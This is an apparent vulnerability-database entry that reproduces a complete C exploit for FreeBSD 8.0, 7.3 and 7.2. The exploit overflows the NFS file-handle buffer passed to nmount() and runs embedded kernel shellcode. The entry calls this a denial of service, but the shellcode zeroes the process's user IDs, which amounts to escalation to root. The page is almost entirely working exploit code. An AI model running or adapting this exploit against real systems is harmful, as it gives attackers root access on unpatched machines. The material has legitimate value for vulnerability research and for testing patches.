FreeBSD 8.0, 7.3 and 7.2 nfs_mount() denial of service vulnerability

🗓️ 25 Nov 2016 00:00:00Reported by SshineType

Local kernel exploit for FreeBSD 8.0, 7.3 and 7.2 nfs_mount() denial of service vulnerabilit


                                                Local kernel exploit for FreeBSD 8.0, 7.3 and 7.2

#include <sys/param.h>
#include <sys/mount.h>
#include <sys/uio.h>
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sysexits.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <errno.h>
#include <nfsclient/nfsargs.h>
 
#define BUFSIZE     272
 
#define FSNAME      "nfs"
#define DIRPATH     "/tmp/nfs"
 
unsigned char kernelcode[] =
"\x64\xa1\x00\x00\x00\x00"      /* movl  %fs:0, %eax */
"\x8b\x40\x04"                  /* movl  0x4(%eax), %eax */
"\x8b\x40\x30"                  /* movl  0x30(%eax),%eax */
"\x31\xc9"                      /* xorl  %ecx, %ecx */
"\x89\x48\x04"                  /* movl  %ecx, 0x4(%eax) */
"\x89\x48\x08"                  /* movl  %ecx, 0x8(%eax) */
"\x81\xc4\xb0\x01\x00\x00"      /* addl  $0x1b0, %esp */
"\x5b"                          /* popl  %ebx */
"\x5e"                          /* popl  %esi */
"\x5f"                          /* popl  %edi */
"\x5d"                          /* popl  %ebp */
"\xc3";                         /* ret */
 
int
main()
{
    char *ptr;
    long *lptr;
    struct nfs_args na;
    struct iovec iov[6];
 
    na.version = 3;
    na.fh = calloc(BUFSIZE, sizeof(char));
 
    if(na.fh == NULL)
    {
        perror("calloc");
        exit(1);
    }
 
    memset(na.fh, 0x41, BUFSIZE);
    na.fhsize = BUFSIZE;
 
    ptr = (char *)na.fh;
    lptr = (long *)(na.fh + BUFSIZE - 8);
     
    *lptr++ = 0x12345678;       /* saved %ebp */
    *lptr++ = (u_long)ptr;      /* saved %eip */
 
    memcpy(ptr, kernelcode, (sizeof(kernelcode) - 1));
 
    mkdir(DIRPATH, 0700);
 
    iov[0].iov_base = "fstype";
    iov[0].iov_len = strlen(iov[0].iov_base) + 1;
     
    iov[1].iov_base = FSNAME;
    iov[1].iov_len = strlen(iov[1].iov_base) + 1;
     
    iov[2].iov_base = "fspath";
    iov[2].iov_len = strlen(iov[2].iov_base) + 1;
     
    iov[3].iov_base = DIRPATH;
    iov[3].iov_len = strlen(iov[3].iov_base) + 1;
 
    iov[4].iov_base = "nfs_args";
    iov[4].iov_len = strlen(iov[4].iov_base) + 1;
 
    iov[5].iov_base = &na;
    iov[5].iov_len = sizeof(na);
 
    printf("[*] calling nmount()\n");
 
    if(nmount(iov, 6, 0) < 0)
    {
        fprintf(stderr, "[!] nmount error: %d\n", errno);
        perror("nmount");
        rmdir(DIRPATH);
        free(na.fh);
        exit(1);
    }
 
    printf("[*] unmounting and deleting %s\n", DIRPATH);
 
    unmount(DIRPATH, 0);
    rmdir(DIRPATH);
    free(na.fh);
 
    return 0;
}
 
/* EOF */

25 Nov 2016 00:00Current

7.1High risk

Vulners AI Score7.1

freebsd nfs_mount()denial of service vulnerability kernel exploit